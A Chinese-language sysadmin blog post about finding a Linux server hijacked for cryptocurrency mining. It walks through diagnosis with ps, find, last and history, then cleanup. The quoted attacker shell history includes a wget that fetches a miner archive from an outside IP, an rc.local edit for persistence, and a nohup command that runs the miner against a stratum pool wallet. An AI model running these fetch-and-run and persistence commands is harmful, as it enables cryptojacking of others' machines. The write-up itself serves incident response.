服务器被入侵当做挖矿肉鸡

早上到公司发现zabbix有一个报警:一台服务器的CPU使用率达到100%! 1.立即登录该服务器查看CPU top10

代码语言:javascript
复制
ps aux | head -1; | ps aux | grep -v PID | sort -rn -k 4 |head

发现 有一个yam开头的进程CPU已经占用120%,(此处无截图) 经确认,并非业务上的应用,凭经验分析,可以断定是被入侵了。

2.find找一下本地有没有yam相关的目录

代码语言:javascript
复制
find / -name yam

已经查到了(下图),就在root家目录下,有压缩包,还有解压的目录,痕迹也太明显了吧! 打开看一下里面的内容发现是一个挖矿机。

这里写图片描述

3.查看下登录日志

代码语言:javascript
复制
last
这里写图片描述

这三个IP是美国的,不知道是不是代理,然后看一下登录进来都做什么操作了:

代码语言:javascript
复制
history

贴出关键部分

代码语言:javascript
复制
884  wget http://210.245.92.160:9090/miner.tgz

885 vi /etc/rc.d/rc.local

886 tar zxvf miner.tgz

887 cd yam-yvg1900-M7v-linux64-generic

888 cd linux64-generic

889 nohup ./yam -c 1 -M stratum+tcp://48zmbpHJyke7y9uewNAS7miDMqQcz8RH7BTqKaYFtVWx2UJ7mzLqVd8KWjeW1Bu5jr2zcUZqTHzYofn3kT76PsndSb5h3M3/xmr

很明显,下载了这个包,解压运行了,还加了开机启动,不过竟然没有清除痕迹就走了。

4.看一下他get的这个网站

这里写图片描述

好吧,自己做的一个页面方便别人下载矿机用的。
在里面的文件发现软件的作者

这里写图片描述

5.清理工作 kill 掉进程 删除root家目录的包 删除/etc/rc.d/rc.local中的开机启动项 更改root密码

先做这么多,大家还有什么好的建议请多指教。